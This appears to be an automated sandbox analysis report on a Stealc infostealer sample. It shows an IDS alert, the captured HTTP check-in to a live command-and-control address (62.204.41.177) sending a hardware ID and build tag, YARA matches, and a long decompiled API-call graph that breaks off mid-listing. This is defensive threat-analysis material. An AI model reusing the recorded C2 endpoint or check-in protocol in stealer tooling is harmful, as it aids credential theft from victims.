                                          2024-10-26T19:03:11.474753+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.74970562.204.41.17780TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 26, 2024 19:03:09.039964914 CEST4970580192.168.2.762.204.41.177
                                          Oct 26, 2024 19:03:09.045398951 CEST804970562.204.41.177192.168.2.7
                                          Oct 26, 2024 19:03:09.045489073 CEST4970580192.168.2.762.204.41.177
                                          Oct 26, 2024 19:03:09.046375990 CEST4970580192.168.2.762.204.41.177
                                          Oct 26, 2024 19:03:09.051857948 CEST804970562.204.41.177192.168.2.7
                                          Oct 26, 2024 19:03:09.937334061 CEST804970562.204.41.177192.168.2.7
                                          Oct 26, 2024 19:03:09.938421965 CEST4970580192.168.2.762.204.41.177
                                          Oct 26, 2024 19:03:09.941030025 CEST4970580192.168.2.762.204.41.177
                                          Oct 26, 2024 19:03:09.946341991 CEST804970562.204.41.177192.168.2.7
                                          Oct 26, 2024 19:03:11.474626064 CEST804970562.204.41.177192.168.2.7
                                          Oct 26, 2024 19:03:11.474752903 CEST4970580192.168.2.762.204.41.177
                                          Oct 26, 2024 19:03:16.431879044 CEST804970562.204.41.177192.168.2.7
                                          Oct 26, 2024 19:03:16.431955099 CEST4970580192.168.2.762.204.41.177
                                          Oct 26, 2024 19:03:36.863143921 CEST4970580192.168.2.762.204.41.177
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 26, 2024 19:03:45.045877934 CEST5356827162.159.36.2192.168.2.7
                                          Oct 26, 2024 19:03:45.989679098 CEST53636571.1.1.1192.168.2.7
                                          • 62.204.41.177
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.74970562.204.41.177804828C:\Users\user\Desktop\oqIz1tfl5h.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 26, 2024 19:03:09.046375990 CEST88OUTGET / HTTP/1.1
                                          Host: 62.204.41.177
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Oct 26, 2024 19:03:09.937334061 CEST203INHTTP/1.1 200 OK
                                          Date: Sat, 26 Oct 2024 17:03:09 GMT
                                          Server: Apache/2.4.52 (Ubuntu)
                                          Content-Length: 0
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Oct 26, 2024 19:03:09.941030025 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJK
                                          Host: 62.204.41.177
                                          Content-Length: 219
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 36 30 38 35 37 41 46 34 45 44 31 32 35 33 31 33 31 38 31 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 2d 2d 0d 0a
                                          Data Ascii: ------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="hwid"BA60857AF4ED1253131813------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="build"default9_cap------DGIJDAFCFHIEHJJKEHJK--
                                          Oct 26, 2024 19:03:11.474626064 CEST210INHTTP/1.1 200 OK
                                          Date: Sat, 26 Oct 2024 17:03:10 GMT
                                          Server: Apache/2.4.52 (Ubuntu)
                                          Content-Length: 8
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                          Data Ascii: YmxvY2s=


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:6
                                          Start time:13:03:00
                                          Start date:26/10/2024
                                          Path:C:\Users\user\Desktop\oqIz1tfl5h.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\oqIz1tfl5h.exe"
                                          Imagebase:0x400000
                                          File size:402'432 bytes
                                          MD5 hash:085DE763171FBBAFEAC2CDB972AACC2A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1600995022.0000000002DFA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000003.1336754852.0000000003070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:12
                                          Start time:13:03:10
                                          Start date:26/10/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1308
                                          Imagebase:0x70000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:6.7%
                                            Dynamic/Decrypted Code Coverage:4.8%
                                            Signature Coverage:12.2%
                                            Total number of Nodes:1418
                                            Total number of Limit Nodes:27
                                            execution_graph 27674 409440 strlen malloc strcpy_s free std::exception::exception 27732 303d106 41 API calls __amsg_exit 27647 3020005 27652 302092b GetPEB 27647->27652 27649 3020030 27653 302003c 27649->27653 27652->27649 27654 3020049 27653->27654 27668 3020e0f SetErrorMode SetErrorMode 27654->27668 27659 3020265 27660 30202ce VirtualProtect 27659->27660 27662 302030b 27660->27662 27661 3020439 VirtualFree 27666 30205f4 LoadLibraryA 27661->27666 27667 30204be 27661->27667 27662->27661 27663 30204e3 LoadLibraryA 27663->27667 27665 30208c7 27666->27665 27667->27663 27667->27666 27669 3020223 27668->27669 27670 3020d90 27669->27670 27671 3020dad 27670->27671 27672 3020dbb GetPEB 27671->27672 27673 3020238 VirtualAlloc 27671->27673 27672->27673 27673->27659 27733 303102b StrCmpCA strtok_s 27702 3036a0a ExitProcess 27734 41ce48 LeaveCriticalSection __mtinitlocknum 27677 41b050 6 API calls 3 library calls 27703 30315b3 19 API calls codecvt 27679 30312eb strtok_s lstrlen lstrcpy 26210 2dfa8ff 26211 2dfa909 26210->26211 26214 2dfaa96 26211->26214 26215 2dfaaa5 26214->26215 26218 2dfb236 26215->26218 26223 2dfb251 26218->26223 26219 2dfb25a CreateToolhelp32Snapshot 26220 2dfb276 Module32First 26219->26220 26219->26223 26221 2dfaa95 26220->26221 26222 2dfb285 26220->26222 26225 2dfaef5 26222->26225 26223->26219 26223->26220 26226 2dfaf20 26225->26226 26227 2dfaf31 VirtualAlloc 26226->26227 26228 2dfaf69 26226->26228 26227->26228 27767 406f60 memcpy 27680 41dc60 atexit 27768 410765 279 API calls 27737 417667 lstrcpy 27738 3031525 strtok_s StrCmpCA strtok_s codecvt 27681 302932a ??2@YAPAXI RaiseException allocator 27740 41b270 5 API calls 2 library calls 27683 3029b37 9 API calls 27770 3031c35 110 API calls 27709 3033b7d 91 API calls 2 library calls 27710 3036a40 6 API calls 27688 41bc11 71 API calls 2 library calls 27773 303140b strtok_s 27775 3036c57 691 API calls 27743 3036d18 645 API calls 27776 303102b StrCmpCA strtok_s lstrlen lstrcpy 27745 302fd67 152 API calls 27691 41ac2c 71 API calls ctype 27711 303cd97 170 API calls setSBUpLow 27712 303be78 162 API calls 2 library calls 27692 4090c3 5 API calls allocator 27780 3033823 6 API calls 27748 303118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27749 303cd8f 6 API calls 2 library calls 27781 303102b StrCmpCA StrCmpCA strtok_s 27714 303ae93 43 API calls 2 library calls 27783 41abd0 free std::exception::_Tidy ctype 27716 3030297 149 API calls 27784 413916 91 API calls 2 library calls 27785 4183dc 15 API calls 27750 303cd90 173 API calls 2 library calls 27694 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27751 41ceea SetUnhandledExceptionFilter 27788 303d0af RtlLeaveCriticalSection __initptd 27718 30332ae 22 API calls 26229 4169f0 26272 402260 26229->26272 26246 417850 3 API calls 26247 416a30 26246->26247 26248 4178e0 3 API calls 26247->26248 26249 416a43 26248->26249 26405 41a9b0 26249->26405 26251 416a64 26252 41a9b0 4 API calls 26251->26252 26253 416a6b 26252->26253 26254 41a9b0 4 API calls 26253->26254 26255 416a72 26254->26255 26256 41a9b0 4 API calls 26255->26256 26257 416a79 26256->26257 26258 41a9b0 4 API calls 26257->26258 26259 416a80 26258->26259 26413 41a8a0 26259->26413 26261 416b0c 26417 416920 GetSystemTime 26261->26417 26263 416a89 26263->26261 26265 416ac2 OpenEventA 26263->26265 26266 416af5 CloseHandle Sleep 26265->26266 26267 416ad9 26265->26267 26269 416b0a 26266->26269 26271 416ae1 CreateEventA 26267->26271 26269->26263 26270 416b16 CloseHandle ExitProcess 26271->26261 26614 4045c0 17 API calls 26272->26614 26274 402274 26275 4045c0 34 API calls 26274->26275 26276 40228d 26275->26276 26277 4045c0 34 API calls 26276->26277 26278 4022a6 26277->26278 26279 4045c0 34 API calls 26278->26279 26280 4022bf 26279->26280 26281 4045c0 34 API calls 26280->26281 26282 4022d8 26281->26282 26283 4045c0 34 API calls 26282->26283 26284 4022f1 26283->26284 26285 4045c0 34 API calls 26284->26285 26286 40230a 26285->26286 26287 4045c0 34 API calls 26286->26287 26288 402323 26287->26288 26289 4045c0 34 API calls 26288->26289 26290 40233c 26289->26290 26291 4045c0 34 API calls 26290->26291 26292 402355 26291->26292 26293 4045c0 34 API calls 26292->26293 26294 40236e 26293->26294 26295 4045c0 34 API calls 26294->26295 26296 402387 26295->26296 26297 4045c0 34 API calls 26296->26297 26298 4023a0 26297->26298 26299 4045c0 34 API calls 26298->26299 26300 4023b9 26299->26300 26301 4045c0 34 API calls 26300->26301 26302 4023d2 26301->26302 26303 4045c0 34 API calls 26302->26303 26304 4023eb 26303->26304 26305 4045c0 34 API calls 26304->26305 26306 402404 26305->26306 26307 4045c0 34 API calls 26306->26307 26308 40241d 26307->26308 26309 4045c0 34 API calls 26308->26309 26310 402436 26309->26310 26311 4045c0 34 API calls 26310->26311 26312 40244f 26311->26312 26313 4045c0 34 API calls 26312->26313 26314 402468 26313->26314 26315 4045c0 34 API calls 26314->26315 26316 402481 26315->26316 26317 4045c0 34 API calls 26316->26317 26318 40249a 26317->26318 26319 4045c0 34 API calls 26318->26319 26320 4024b3 26319->26320 26321 4045c0 34 API calls 26320->26321 26322 4024cc 26321->26322 26323 4045c0 34 API calls 26322->26323 26324 4024e5 26323->26324 26325 4045c0 34 API calls 26324->26325 26326 4024fe 26325->26326 26327 4045c0 34 API calls 26326->26327 26328 402517 26327->26328 26329 4045c0 34 API calls 26328->26329 26330 402530 26329->26330 26331 4045c0 34 API calls 26330->26331 26332 402549 26331->26332 26333 4045c0 34 API calls 26332->26333 26334 402562 26333->26334 26335 4045c0 34 API calls 26334->26335 26336 40257b 26335->26336 26337 4045c0 34 API calls 26336->26337 26338 402594 26337->26338 26339 4045c0 34 API calls 26338->26339 26340 4025ad 26339->26340 26341 4045c0 34 API calls 26340->26341 26342 4025c6 26341->26342 26343 4045c0 34 API calls 26342->26343 26344 4025df 26343->26344 26345 4045c0 34 API calls 26344->26345 26346 4025f8 26345->26346 26347 4045c0 34 API calls 26346->26347 26348 402611 26347->26348 26349 4045c0 34 API calls 26348->26349 26350 40262a 26349->26350 26351 4045c0 34 API calls 26350->26351 26352 402643 26351->26352 26353 4045c0 34 API calls 26352->26353 26354 40265c 26353->26354 26355 4045c0 34 API calls 26354->26355 26356 402675 26355->26356 26357 4045c0 34 API calls 26356->26357 26358 40268e 26357->26358 26359 419860 26358->26359 26618 419750 GetPEB 26359->26618 26361 419868 26362 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26361->26362 26363 41987a 26361->26363 26364 419af4 GetProcAddress 26362->26364 26365 419b0d 26362->26365 26366 41988c 21 API calls 26363->26366 26364->26365 26367 419b46 26365->26367 26368 419b16 GetProcAddress GetProcAddress 26365->26368 26366->26362 26369 419b68 26367->26369 26370 419b4f GetProcAddress 26367->26370 26368->26367 26371 419b71 GetProcAddress 26369->26371 26372 419b89 26369->26372 26370->26369 26371->26372 26373 416a00 26372->26373 26374 419b92 GetProcAddress GetProcAddress 26372->26374 26375 41a740 26373->26375 26374->26373 26376 41a750 26375->26376 26377 416a0d 26376->26377 26378 41a77e lstrcpy 26376->26378 26379 4011d0 26377->26379 26378->26377 26380 4011e8 26379->26380 26381 401217 26380->26381 26382 40120f ExitProcess 26380->26382 26383 401160 GetSystemInfo 26381->26383 26384 401184 26383->26384 26385 40117c ExitProcess 26383->26385 26386 401110 GetCurrentProcess VirtualAllocExNuma 26384->26386 26387 401141 ExitProcess 26386->26387 26388 401149 26386->26388 26619 4010a0 VirtualAlloc 26388->26619 26391 401220 26623 4189b0 26391->26623 26394 401249 __aulldiv 26395 40129a 26394->26395 26396 401292 ExitProcess 26394->26396 26397 416770 GetUserDefaultLangID 26395->26397 26398 4167d3 GetUserDefaultLCID 26397->26398 26399 416792 26397->26399 26398->26246 26399->26398 26400 4167c1 ExitProcess 26399->26400 26401 4167a3 ExitProcess 26399->26401 26402 4167b7 ExitProcess 26399->26402 26403 4167cb ExitProcess 26399->26403 26404 4167ad ExitProcess 26399->26404 26625 41a710 26405->26625 26407 41a9c1 lstrlenA 26409 41a9e0 26407->26409 26408 41aa18 26626 41a7a0 26408->26626 26409->26408 26411 41a9fa lstrcpy lstrcatA 26409->26411 26411->26408 26412 41aa24 26412->26251 26414 41a8bb 26413->26414 26415 41a90b 26414->26415 26416 41a8f9 lstrcpy 26414->26416 26415->26263 26416->26415 26630 416820 26417->26630 26419 41698e 26420 416998 sscanf 26419->26420 26659 41a800 26420->26659 26422 4169aa SystemTimeToFileTime SystemTimeToFileTime 26423 4169e0 26422->26423 26424 4169ce 26422->26424 26426 415b10 26423->26426 26424->26423 26425 4169d8 ExitProcess 26424->26425 26427 415b1d 26426->26427 26428 41a740 lstrcpy 26427->26428 26429 415b2e 26428->26429 26661 41a820 lstrlenA 26429->26661 26432 41a820 2 API calls 26433 415b64 26432->26433 26434 41a820 2 API calls 26433->26434 26435 415b74 26434->26435 26665 416430 26435->26665 26438 41a820 2 API calls 26439 415b93 26438->26439 26440 41a820 2 API calls 26439->26440 26441 415ba0 26440->26441 26442 41a820 2 API calls 26441->26442 26443 415bad 26442->26443 26444 41a820 2 API calls 26443->26444 26445 415bf9 26444->26445 26674 4026a0 26445->26674 26453 415cc3 26454 416430 lstrcpy 26453->26454 26455 415cd5 26454->26455 26456 41a7a0 lstrcpy 26455->26456 26457 415cf2 26456->26457 26458 41a9b0 4 API calls 26457->26458 26459 415d0a 26458->26459 26460 41a8a0 lstrcpy 26459->26460 26461 415d16 26460->26461 26462 41a9b0 4 API calls 26461->26462 26463 415d3a 26462->26463 26464 41a8a0 lstrcpy 26463->26464 26465 415d46 26464->26465 26466 41a9b0 4 API calls 26465->26466 26467 415d6a 26466->26467 26468 41a8a0 lstrcpy 26467->26468 26469 415d76 26468->26469 26470 41a740 lstrcpy 26469->26470 26471 415d9e 26470->26471 27400 417500 GetWindowsDirectoryA 26471->27400 26474 41a7a0 lstrcpy 26475 415db8 26474->26475 27410 404880 26475->27410 26477 415dbe 27556 4117a0 26477->27556 26479 415dc6 26480 41a740 lstrcpy 26479->26480 26481 415de9 26480->26481 26482 401590 lstrcpy 26481->26482 26483 415dfd 26482->26483 27576 405960 39 API calls ctype 26483->27576 26485 415e03 27577 411050 strtok_s strtok_s lstrlenA lstrcpy 26485->27577 26487 415e0e 26488 41a740 lstrcpy 26487->26488 26489 415e32 26488->26489 26490 401590 lstrcpy 26489->26490 26491 415e46 26490->26491 27578 405960 39 API calls ctype 26491->27578 26493 415e4c 27579 410d90 7 API calls 26493->27579 26495 415e57 26496 41a740 lstrcpy 26495->26496 26497 415e79 26496->26497 26498 401590 lstrcpy 26497->26498 26499 415e8d 26498->26499 27580 405960 39 API calls ctype 26499->27580 26501 415e93 27581 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26501->27581 26503 415e9e 26504 401590 lstrcpy 26503->26504 26505 415eb5 26504->26505 27582 411a10 121 API calls 26505->27582 26507 415eba 26508 41a740 lstrcpy 26507->26508 26509 415ed6 26508->26509 27583 404fb0 8 API calls 26509->27583 26511 415edb 26512 401590 lstrcpy 26511->26512 26513 415f5b 26512->26513 27584 410740 292 API calls 26513->27584 26515 415f60 26516 41a740 lstrcpy 26515->26516 26517 415f86 26516->26517 26518 401590 lstrcpy 26517->26518 26519 415f9a 26518->26519 27585 405960 39 API calls ctype 26519->27585 26521 415fa0 27586 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26521->27586 26523 415fab 26524 401590 lstrcpy 26523->26524 26525 415feb 26524->26525 27587 401e80 67 API calls 26525->27587 26527 415ff0 26528 416000 26527->26528 26529 416092 26527->26529 26531 41a740 lstrcpy 26528->26531 26530 41a7a0 lstrcpy 26529->26530 26532 4160a5 26530->26532 26533 416020 26531->26533 26535 401590 lstrcpy 26532->26535 26534 401590 lstrcpy 26533->26534 26536 416034 26534->26536 26537 4160b9 26535->26537 27588 405960 39 API calls ctype 26536->27588 27591 405960 39 API calls ctype 26537->27591 26540 4160bf 27592 413560 36 API calls 26540->27592 26541 41603a 27589 4112d0 21 API calls ctype 26541->27589 26544 41608a 26547 41610b 26544->26547 26549 401590 lstrcpy 26544->26549 26545 416045 26546 401590 lstrcpy 26545->26546 26548 416085 26546->26548 26551 416130 26547->26551 26554 401590 lstrcpy 26547->26554 27590 413dc0 75 API calls 26548->27590 26553 4160e7 26549->26553 26552 416155 26551->26552 26556 401590 lstrcpy 26551->26556 26558 41617a 26552->26558 26563 401590 lstrcpy 26552->26563 27593 4140b0 64 API calls ctype 26553->27593 26555 41612b 26554->26555 27595 414780 116 API calls ctype 26555->27595 26561 416150 26556->26561 26559 41619f 26558->26559 26564 401590 lstrcpy 26558->26564 26565 4161c4 26559->26565 26570 401590 lstrcpy 26559->26570 27596 414bb0 67 API calls ctype 26561->27596 26562 4160ec 26567 401590 lstrcpy 26562->26567 26568 416175 26563->26568 26569 41619a 26564->26569 26572 4161e9 26565->26572 26578 401590 lstrcpy 26565->26578 26571 416106 26567->26571 27597 414d70 75 API calls 26568->27597 27598 414f40 69 API calls ctype 26569->27598 26576 4161bf 26570->26576 27594 415100 71 API calls 26571->27594 26574 416210 26572->26574 26579 401590 lstrcpy 26572->26579 26580 416220 26574->26580 26581 4162b3 26574->26581 27599 407710 125 API calls ctype 26576->27599 26583 4161e4 26578->26583 26584 416209 26579->26584 26586 41a740 lstrcpy 26580->26586 26585 41a7a0 lstrcpy 26581->26585 27600 415050 67 API calls ctype 26583->27600 27601 419010 54 API calls ctype 26584->27601 26589 4162c6 26585->26589 26590 416241 26586->26590 26591 401590 lstrcpy 26589->26591 26592 401590 lstrcpy 26590->26592 26593 4162da 26591->26593 26594 416255 26592->26594 27605 405960 39 API calls ctype 26593->27605 27602 405960 39 API calls ctype 26594->27602 26597 4162e0 27606 413560 36 API calls 26597->27606 26598 41625b 27603 4112d0 21 API calls ctype 26598->27603 26601 416266 26603 401590 lstrcpy 26601->26603 26602 4162ab 26605 41a7a0 lstrcpy 26602->26605 26604 4162a6 26603->26604 27604 413dc0 75 API calls 26604->27604 26606 4162fc 26605->26606 26608 401590 lstrcpy 26606->26608 26609 416310 26608->26609 27607 405960 39 API calls ctype 26609->27607 26611 41631c 26613 416338 26611->26613 27608 416630 9 API calls ctype 26611->27608 26613->26270 26615 404697 26614->26615 26616 4046ac 11 API calls 26615->26616 26617 40474f 6 API calls 26615->26617 26616->26615 26617->26274 26618->26361 26621 4010c2 ctype 26619->26621 26620 4010fd 26620->26391 26621->26620 26622 4010e2 VirtualFree 26621->26622 26622->26620 26624 401233 GlobalMemoryStatusEx 26623->26624 26624->26394 26625->26407 26627 41a7c2 26626->26627 26628 41a7ec 26627->26628 26629 41a7da lstrcpy 26627->26629 26628->26412 26629->26628 26631 41a740 lstrcpy 26630->26631 26632 416833 26631->26632 26633 41a9b0 4 API calls 26632->26633 26634 416845 26633->26634 26635 41a8a0 lstrcpy 26634->26635 26636 41684e 26635->26636 26637 41a9b0 4 API calls 26636->26637 26638 416867 26637->26638 26639 41a8a0 lstrcpy 26638->26639 26640 416870 26639->26640 26641 41a9b0 4 API calls 26640->26641 26642 41688a 26641->26642 26643 41a8a0 lstrcpy 26642->26643 26644 416893 26643->26644 26645 41a9b0 4 API calls 26644->26645 26646 4168ac 26645->26646 26647 41a8a0 lstrcpy 26646->26647 26648 4168b5 26647->26648 26649 41a9b0 4 API calls 26648->26649 26650 4168cf 26649->26650 26651 41a8a0 lstrcpy 26650->26651 26652 4168d8 26651->26652 26653 41a9b0 4 API calls 26652->26653 26654 4168f3 26653->26654 26655 41a8a0 lstrcpy 26654->26655 26656 4168fc 26655->26656 26657 41a7a0 lstrcpy 26656->26657 26658 416910 26657->26658 26658->26419 26660 41a812 26659->26660 26660->26422 26662 41a83f 26661->26662 26663 415b54 26662->26663 26664 41a87b lstrcpy 26662->26664 26663->26432 26664->26663 26666 41a8a0 lstrcpy 26665->26666 26667 416443 26666->26667 26668 41a8a0 lstrcpy 26667->26668 26669 416455 26668->26669 26670 41a8a0 lstrcpy 26669->26670 26671 416467 26670->26671 26672 41a8a0 lstrcpy 26671->26672 26673 415b86 26672->26673 26673->26438 26675 4045c0 34 API calls 26674->26675 26676 4026b4 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 4026d7 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 4026f0 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 402709 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 402736 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 40274f 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 402768 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 402795 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 4027ae 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 4027c7 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 4027e0 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 4027f9 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 402812 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 40282b 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 402844 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 40285d 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 402876 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 40288f 26709->26710 26711 4045c0 34 API calls 26710->26711 26712 4028a8 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 4028c1 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 4028da 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 4028f3 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 40290c 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 402925 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 40293e 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 402957 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 402970 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 402989 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 4029a2 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 4029bb 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 4029d4 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 4029ed 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 402a06 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 402a1f 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 402a38 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 402a51 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 402a6a 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 402a83 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 402a9c 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 402ab5 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 402ace 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 402ae7 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 402b00 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 402b19 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 402b32 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 402b4b 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 402b64 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 402b7d 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 402b96 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 402baf 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 402bc8 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 402be1 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 402bfa 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 402c13 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 402c2c 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 402c45 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 402c5e 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 402c77 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 402c90 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 402ca9 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 402cc2 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 402cdb 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 402cf4 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 402d0d 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 402d26 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 402d3f 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 402d58 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 402d71 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 402d8a 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 402da3 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 402dbc 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 402dd5 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 402dee 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 402e07 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 402e20 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 402e39 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 402e52 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 402e6b 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 402e84 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 402e9d 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 402eb6 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 402ecf 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 402ee8 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 402f01 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 402f1a 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 402f33 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 402f4c 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 402f65 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 402f7e 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 402f97 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 402fb0 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 402fc9 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 402fe2 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 402ffb 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 403014 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 40302d 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 403046 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 40305f 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 403078 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 403091 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 